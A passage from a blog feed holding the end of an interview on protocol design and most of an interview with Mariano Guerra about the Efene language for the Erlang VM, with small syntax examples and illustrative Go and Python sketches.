&lt;p&gt;We need distribution. If we rely on big players, we tie ourselves to their solutions. This will be a bane going forward as we build infrastructure around vendors only interested in lock-in.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;And finally, we need education. A lot of the current “protocol design” is so bad compared to what can be found in old RFCs. If you want to implement something new, you need to study the past a lot before you build it. If you reject an old idea, you need to explain why. If you reinvent an old idea, you need to know you reinvented it and what happened historically for that idea not to catch on.”&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Could you give us some recommendations of RFCs, books, and articles to read, and exercises to do, to learn how to design protocols?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Good protocol design is an art form. The goal is to produce protocols which are simple to implement, hard to implement wrong, and open to future extension. Take the TCP protocol for instance. You can implement it in hardware as a simple stop-and-go protocol, ignoring everything about sliding windows. This is a correct and valid implementation of the protocol, though it will be slow. Once that works, you can add layers on top which make the protocol faster. In addition to the RFCs for TCP, James E. White’s RFCs, 707 and 708, are dear to my heart. They were written in 1976, and they handle a problem we still have to this day: how distributed machines will communicate.&lt;&#x2F;p&gt;
&lt;p&gt;The BitTorrent protocol deserves mention as well. It defines how clients communicate, but it gives relatively few rules about how a client is supposed to implement its behavior. Once you set forth and start implementing the protocol, however, you find there is only one true way of doing each part, so that could be left out of the specification. Instead, a minimal viable protocol is given, and the details can be altered as you go along. But also note how the original BT protocol used a 64-bit array in the handshake rendezvous in order to negotiate what additional features were supported. This was later replaced with a fully extensible system because it proved to be inadequate. Whenever you see such patches to a protocol design, think about how they could have been avoided in the first place.&lt;&#x2F;p&gt;
&lt;p&gt;Another incredibly well-designed protocol is the 9p protocol from Plan9. It is generic enough that it can be adapted to a lot of other situations as well. It implements many good ideas, like out-of-order messaging, proper multiplexing of messages on one channel, requests initiated from both ends of the connection, and so on.&lt;&#x2F;p&gt;
&lt;p&gt;The general advice is to cut out any part which dictates how the peer should behave internally. You need to maximize the freedom of the implementer and only establish the basis for communication. Cut, cut, cut. Leave out everything which will not destroy the coherency and internal consistency of the protocol. Layer the protocol and push things into separate layers. A layered protocol is much easier to reason about formally, and you had better be doing so, through either model checking or quickchecking the protocol internals.&lt;&#x2F;p&gt;
&lt;p&gt;One should read the critiques of HTTP&#x2F;2.0 and how we got there from HTTP&#x2F;1.1. The protocol suffers from some rushed work, sadly. Read some of the simpler alternative approaches. As an example, the PUSH message from server to client in HTTP&#x2F;2.0 grows out of White’s observation in RFC 707: both peers in a protocol need to be able to initiate communication. But HTTP is skewed, like most RPC, since all communication is initiated from the client toward the server.&lt;&#x2F;p&gt;
&lt;p&gt;A good approach is that of Roy T. Fielding: define what constraints you need, and then squeeze hard until the minimal protocol comes out. That is, start by defining a large framing of what you need your protocol to do and then create a protocol with those properties. TCP is defined by its constraints: a stream protocol, connection-oriented, without data loss. ZeroMQ is a message channel, connection-oriented, without data loss. UDP is message-oriented, datagram-based, with loss. SCTP is …, and so on.&lt;&#x2F;p&gt;
&lt;p&gt;Protocols are far better than APIs because they invite multiple competing implementations of the same thing. They debug themselves over time by virtue of non-interaction between peers. And they open up the design space, rather than closing it down. In a distributed world, we should not be slaves to API designs by large mega-corporations, but be masters of the protocols.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Efene: an Erlang VM language that embraces the Zen of Python</title>
          <pubDate>Fri, 27 Nov 2015 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/efene-an-erlang-vm-language-that-embraces-the-python-zen/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/efene-an-erlang-vm-language-that-embraces-the-python-zen/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/efene-an-erlang-vm-language-that-embraces-the-python-zen/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-Y6aaUiw3qoh372nY7WNzJg.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;On this occasion we interviewed &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;marianoguerra&quot;&gt;Mariano Guerra&lt;&#x2F;a&gt;, creator of Efene. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;efene.org&#x2F;&quot;&gt;Efene&lt;&#x2F;a&gt; is &lt;em&gt;“an alternative syntax for the Erlang Programming Language focusing on simplicity, consistency, ease of use and programmer UX”.&lt;&#x2F;em&gt; After reading the interview with Mariano Guerra, check &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;efene.org&#x2F;quick-efene-introduction-busy-programmer.html&quot;&gt;Efene Quick Introduction for the Busy&#x2F;Lazy Programmer&lt;&#x2F;a&gt; to learn more about Efene.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did you create efene?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I learn by doing, and a while ago I wanted to learn Erlang. It was the first functional programming language I wanted to learn, coming from C, C++, ASM, Java and Python, so I was looking for some toy project to learn it with.&lt;&#x2F;p&gt;
&lt;p&gt;For a while I couldn’t find a project that was interesting to me and also matched the strengths of Erlang. At some point I decided that I would do a small calculator in Erlang; you can see the first commit &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;marianoguerra&#x2F;match&#x2F;commit&#x2F;cc048638b4cc99719ad5c28cea2f9e8163b9661c&quot;&gt;here&lt;&#x2F;a&gt; and the full project &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;marianoguerra&#x2F;match&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;At first I was doing all the eval stuff myself, but pretty quickly I added support to compile the expression to an Erlang &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;marianoguerra&#x2F;match&#x2F;commit&#x2F;6c726f641e5d651f6bb46b2ae04202e557ea022b&quot;&gt;module with a function&lt;&#x2F;a&gt;. The next commit added function support, and then I realized there was a programming language there; you can read the rest of the commits to see how it morphed into one.&lt;&#x2F;p&gt;
&lt;p&gt;At that point the only BEAM language other than Erlang was &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;reia-lang.org&#x2F;&quot;&gt;Reia&lt;&#x2F;a&gt;. I wasn’t planning anything in particular with my powerful calculator&#x2F;language hybrid, but at some point people from Erlang Factory asked me if I wanted to give a talk about my language, and of course I said yes. Then I got a dose of impostor syndrome, so I started the project from scratch to build a proper programming language, and I decided to support every feature that Erlang supports and not much more. At that point the project changed from a toy to an actual programming language.&lt;&#x2F;p&gt;
&lt;p&gt;After &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.erlang-factory.com&#x2F;conference&#x2F;London2010&#x2F;speakers&#x2F;MarianoGuerra&quot;&gt;my talk&lt;&#x2F;a&gt; and some initial excitement, things got quiet. I had just gotten my engineering degree and had a new job, so development stopped for a while. Then Elixir appeared and got much more attention, so I thought “OK, someone got it right, I will just stop pushing efene”, and some years passed. But then, looking into Elixir, I saw that its ideas weren’t exactly the ideas of efene, so I decided to rewrite efene to try to fill the niche of “just a different syntax for Erlang, reuse as much as possible from the Erlang ecosystem, unified tooling and documentation as the core of the project”. The language has been complete for a while now. I’m just working on documentation and rebar3 plugins, and waiting for some of the surrounding tools to mature to avoid having to redo the documentation (mainly &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;rebar&#x2F;rebar3&quot;&gt;rebar3&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=YGuAXS0Cy_8&quot;&gt;cowboy 2&lt;&#x2F;a&gt;).&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why do you embrace the&lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.python.org&#x2F;dev&#x2F;peps&#x2F;pep-0020&#x2F;&quot;&gt;&lt;strong&gt;Zen of Python&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-6_ijRzr0oB6Zckr8GTrq4A.png&quot; alt=&quot;&quot; &#x2F;&gt; Zen of Python&lt;&#x2F;p&gt;
&lt;p&gt;Before Python I coded in C, C++, ASM and Java, but just because they were what I knew or provided something I needed; Python was the first language I truly enjoyed coding in. With Python it was the first time I said “I’m a Python programmer” and not “I’m a programmer”, and the Python Argentina community helped a lot with that.&lt;&#x2F;p&gt;
&lt;p&gt;Python has this attitude of simplicity and community that I like, and instead of coming up with an “ad hoc, informally-specified, bug-ridden, slow implementation of half of the Zen of Python” I decided just to copy it.&lt;&#x2F;p&gt;
&lt;p&gt;David Nolen summarized it well the other day:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;swannodette&#x2F;status&#x2F;667694050426945536&quot;&gt;https:&#x2F;&#x2F;twitter.com&#x2F;swannodette&#x2F;status&#x2F;667694050426945536&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;That’s why efene is a mixture of what I like about the languages, communities and philosophies of Python, Javascript and Erlang. Don’t expect a lot of novelty in efene, just a remix of what’s there :).&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Could you show to us a short and good example of an efene program?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I can’t think of a particularly short snippet of code that will show you all the interesting bits of efene, mainly because there are no clever parts to efene; the idea is to be regular, simple, explicit and readable.&lt;&#x2F;p&gt;
&lt;p&gt;This means it doesn’t try to win a code-golf competition or show off some clever language trick.&lt;&#x2F;p&gt;
&lt;p&gt;But I think you can take a look at this project which is a client for an API that supports REST, Web Sockets, Server Sent Events and COMET and then starts some clients that send some pseudo-random stuff to test the server:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;marianoguerra&#x2F;ioriofn&#x2F;&quot;&gt;marianoguerra&#x2F;ioriofn: ioriodb client and tests in efene&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;If your reaction is “I understand this and this is boring”, then I am happy :). Of course, knowing some Erlang will help the understanding, since efene’s semantics and patterns are the same as Erlang’s.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Which are the biggest advantages of coding in a language that runs on top of the Erlang VM (BEAM)?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The semantics of the VM are really well thought out and really simple to learn.&lt;&#x2F;p&gt;
&lt;p&gt;The stability and scalability of the platform are great, and a lot of people have worked on really hard problems for a long time on top of the Erlang VM, which means you can get really good advice and help from them.&lt;&#x2F;p&gt;
&lt;p&gt;One thing I really like, and I don’t think is mentioned that much, is the level of runtime introspection and visibility the VM has; the tooling that is built and can be built around it is great.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What difficulties did you find in implementing efene?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Learning the limits of the parser and what syntax is valid and unambiguous, and learning to avoid introducing crazy ideas into the language, because syntax and semantics are always tricky and you don’t want to have a “WAT” language.&lt;&#x2F;p&gt;
&lt;p&gt;Also learning about Erlang and its VM while doing it.&lt;&#x2F;p&gt;
&lt;p&gt;But to sum it up, it ended up not being as difficult as I thought it would be; it just requires persistence and some hammock-driven development ;)&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Do you have any recommendation for those of us who have not implemented any language yet?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Learn about lexing and parsing, then build a calculator using S-Expressions (Lisp-like) or reverse-polish syntax (Forth-like).&lt;&#x2F;p&gt;
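&lt;p&gt;A toy version of that exercise, sketched here in Go rather than on the BEAM (the &lt;code&gt;evalRPN&lt;&#x2F;code&gt; function is invented for illustration): a reverse-polish (Forth-like) calculator evaluated with a stack, the usual first step before growing an interpreter into a language.&lt;&#x2F;p&gt;

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// evalRPN evaluates a whitespace-separated reverse-polish
// expression over integers, e.g. "2 3 + 4 *" = (2+3)*4.
func evalRPN(src string) (int, error) {
	var stack []int
	for _, tok := range strings.Fields(src) {
		switch tok {
		case "+", "-", "*":
			if len(stack) < 2 {
				return 0, fmt.Errorf("stack underflow at %q", tok)
			}
			b, a := stack[len(stack)-1], stack[len(stack)-2]
			stack = stack[:len(stack)-2]
			switch tok {
			case "+":
				stack = append(stack, a+b)
			case "-":
				stack = append(stack, a-b)
			case "*":
				stack = append(stack, a*b)
			}
		default:
			// Anything else must be an integer literal.
			n, err := strconv.Atoi(tok)
			if err != nil {
				return 0, err
			}
			stack = append(stack, n)
		}
	}
	if len(stack) != 1 {
		return 0, fmt.Errorf("leftover stack: %v", stack)
	}
	return stack[0], nil
}

func main() {
	v, _ := evalRPN("2 3 + 4 *") // (2+3)*4
	fmt.Println(v)
}
```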
&lt;p&gt;Start it as an interpreter and copy the semantics from a simple language you already know; coming up with good semantics is hard, so don’t try to invent them the first time.&lt;&#x2F;p&gt;
&lt;p&gt;Then ride on top of a language you know, either transpile to that language or compile to bytecode or some intermediate representation.&lt;&#x2F;p&gt;
&lt;p&gt;Try to reuse as much of the tooling from the other language as possible (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.erlang.org&#x2F;doc&#x2F;apps&#x2F;erts&#x2F;absform.html&quot;&gt;AST from Erlang&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.python.org&#x2F;3&#x2F;library&#x2F;ast.html&quot;&gt;AST from Python&lt;&#x2F;a&gt; or similar), this will allow you to reuse all the tooling and code built around those representations.&lt;&#x2F;p&gt;
&lt;p&gt;Read about Lisps and Forth. Implement a simple Lisp (Scheme) or Forth.&lt;&#x2F;p&gt;
&lt;p&gt;Once you learn to lex and parse, you can think up syntax for languages and try to parse it.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is the match expression and why did you introduce it?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;At the core of the efene rewrite was the concept that “everything revolves around 4 main things: pattern matching, functions, guards and data”. Pattern matching is done when using the equal sign (=), in the argument list of a function definition, and in other Erlang expressions. I wanted to unify pattern matching under a single syntax and reuse it everywhere; that’s how the “case clauses” came to be.&lt;&#x2F;p&gt;
&lt;p&gt;If you haven’t looked at efene yet, the shape of efene expressions is something like:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;lt;keyword&amp;gt; [&amp;lt;expr-args&amp;gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;lt;case-clauses&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [else: &amp;lt;body&amp;gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;A case-clause has this shape:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;case &amp;lt;case-args&amp;gt; [when &amp;lt;guards&amp;gt;]: &amp;lt;body&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;For example try&#x2F;catch:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;try&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;lt;body&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;catch&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;lt;case-clauses&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [else: &amp;lt;body&amp;gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[after &amp;lt;body&amp;gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Receive:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;receive&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;lt;case-clauses&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [else: &amp;lt;body&amp;gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[after &amp;lt;after-expr&amp;gt;: &amp;lt;body&amp;gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Functions:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn [&amp;lt;name&amp;gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;lt;case-clauses&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [else: &amp;lt;body&amp;gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;You should see a pattern there. Since the case keyword was already taken, and it’s what Erlang uses for what “match” does in efene, I had to look for a new keyword.&lt;&#x2F;p&gt;
&lt;p&gt;One thing I like about Python is this concept of “executable pseudocode”; I like the fact that if you read Python code aloud it sounds like what it does. So I thought: “what am I doing here?”, “I’m matching an expression against cases”. In imperative terms it would be “match A [against] case B, case C, else … end”, and that’s how I ended up with match.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did you introduce a &lt;em&gt;for&lt;&#x2F;em&gt; expression?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The initial idea for efene was to be familiar for people coming from “algol-like” or “mainstream” languages, so they can focus on learning what’s interesting about Erlang which are the semantics and the abstractions and avoid learning a new syntax on the way to epiphany.&lt;&#x2F;p&gt;
&lt;p&gt;Since list comprehensions aren’t available in many of those languages but “for” is, I decided to implement list comprehensions as a more familiar construct which in fact does the same thing.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is the arrow operator and why did you add it?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;First a quick introduction for people unfamiliar with efene or the arrow operator.&lt;&#x2F;p&gt;
&lt;p&gt;There’s this thing in Erlang where if you want to apply a sequence of operations to a list you have to create a new binding for each intermediate result:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;MyList = create_list(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;MyList1 = op1(MyList),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;MyList2 = op2(MyList1),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;MyList3 = op3(MyList2),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;MyList4 = op4(MyList3).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Then if you want to reorder or remove some of the operations you have to rearrange the names to fit.&lt;&#x2F;p&gt;
&lt;p&gt;The idea of the arrow operator is to help with that. It’s a compile-time operation, which means that if you write:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;MyList = create_list() -&amp;gt; op1() -&amp;gt; op2() -&amp;gt; op3() -&amp;gt; op4()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;It will compile to:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;MyList = op4(op3(op2(op1(create_list()))))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The thing is that the Erlang libraries don’t have a standard position for the thing you are operating on, unlike other languages where it tends to be the first argument. So, inspired by Clojure (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;clojuredocs.org&#x2F;clojure.core&#x2F;-%3E&quot;&gt;http:&#x2F;&#x2F;clojuredocs.org&#x2F;clojure.core&#x2F;-%3E&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;clojuredocs.org&#x2F;clojure.core&#x2F;-%3E%3E&quot;&gt;http:&#x2F;&#x2F;clojuredocs.org&#x2F;clojure.core&#x2F;-%3E%3E&lt;&#x2F;a&gt;),&lt;br &#x2F;&gt;
I created two variants:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;“-&amp;gt;”&lt;&#x2F;em&gt; adds the result of evaluating the expression on the left as the first argument of the function call on the right.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;“-&amp;gt;&amp;gt;”&lt;&#x2F;em&gt; adds the result of evaluating the expression on the left as the last argument of the function call on the right.&lt;&#x2F;p&gt;
&lt;p&gt;But thinking about symmetry, and about another common idiom in Erlang and other functional languages, higher-order functions (passing functions as arguments to other functions), I decided to create the reverse of those, but with a more restricted use.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;“ &amp;lt;-”&lt;&#x2F;em&gt; adds the case clauses on the right as an anonymous function as last argument on the function call on the left.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;“ &amp;lt;&amp;lt;-”&lt;&#x2F;em&gt; adds the case clauses on the right as an anonymous function as first argument on the function call on the left.&lt;&#x2F;p&gt;
&lt;p&gt;You can see it says “case clauses” and not “anonymous function”; this is because you don’t have to write the &lt;em&gt;fn&lt;&#x2F;em&gt; keyword, which gives the expression a DSL taste that I like, for example:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;lists.map(Things) &amp;lt;&amp;lt;-&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; case 0: zero&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; case A when A % 2 is 0: even&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; else odd&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Going back to the restricted use of the right-to-left arrows: since code reads from left to right, putting something on the right that is just a value doesn’t help readability, so I decided not to support it.&lt;&#x2F;p&gt;
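&lt;p&gt;The behaviour of the two left-to-right arrows can be sketched outside efene. A minimal Python model (the helper names &lt;em&gt;thread_first&lt;&#x2F;em&gt; and &lt;em&gt;thread_last&lt;&#x2F;em&gt; are hypothetical, chosen only for this illustration) that inserts the piped value as the first or last argument:&lt;&#x2F;p&gt;

```python
def thread_first(value, *steps):
    # Each step is a (function, *extra_args) tuple; the piped value
    # is inserted as the FIRST argument, like efene's "->" operator.
    for fn, *args in steps:
        value = fn(value, *args)
    return value

def thread_last(value, *steps):
    # Same idea, but the piped value goes LAST, like "->>".
    for fn, *args in steps:
        value = fn(*args, value)
    return value

# "->": the string is the first argument at each step
cleaned = thread_first("  hello  ", (str.strip,), (str.upper,))

# "->>": the sequence is the last argument, map/filter style
doubled_evens = list(thread_last([1, 2, 3, 4],
                                 (map, lambda x: x * 2),
                                 (filter, lambda x: x > 4)))
```

&lt;p&gt;Here &lt;em&gt;cleaned&lt;&#x2F;em&gt; is “HELLO” and &lt;em&gt;doubled_evens&lt;&#x2F;em&gt; is [6, 8]; the only difference between the two helpers is the position where the threaded value lands.&lt;&#x2F;p&gt;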
&lt;p&gt;&lt;strong&gt;I just saw that you are creating a new language for the BEAM called interfix. What is it?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;As I said above, efene is a language that doesn’t try to come up with anything new. This led me to avoid doing experiments on efene itself, but I still wanted to do those experiments somewhere else.&lt;&#x2F;p&gt;
&lt;p&gt;With time, the ideas I had for crazy languages grew and condensed to the point where I thought I had a nice little language. Then, coming back from a conference, I had a lot of dead time in airports and no internet, so I decided to give it a try.&lt;&#x2F;p&gt;
&lt;p&gt;After I landed the language kept growing, and since none of the ideas seemed to cause any problems I grew it quite fast; as of the last few days it’s almost a complete language (in the sense that it can do everything Erlang can do).&lt;&#x2F;p&gt;
&lt;p&gt;At this point I’m finishing adding the remaining features and when everything is there and I know everything fits I will move to cleaning the code and adding some tooling and docs around it for people that want to play with a more “experimental” language.&lt;&#x2F;p&gt;
&lt;p&gt;I say experimental in the sense that it has some crazy ideas in it but not experimental in that it will crash, break backward compatibility or compile the code to wrong bytecode.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;You wrote the &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;marianoguerra.github.io&#x2F;little-riak-core-book&#x2F;&quot;&gt;&lt;strong&gt;Little Riak Core Book&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt; and you gave a talk called &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=eiVqDnA0k0U&quot;&gt;&lt;strong&gt;From 0 to a working distributed system with riak_core&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;. Could you explain what Riak Core is and why it can be useful for those of us who implement distributed systems?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
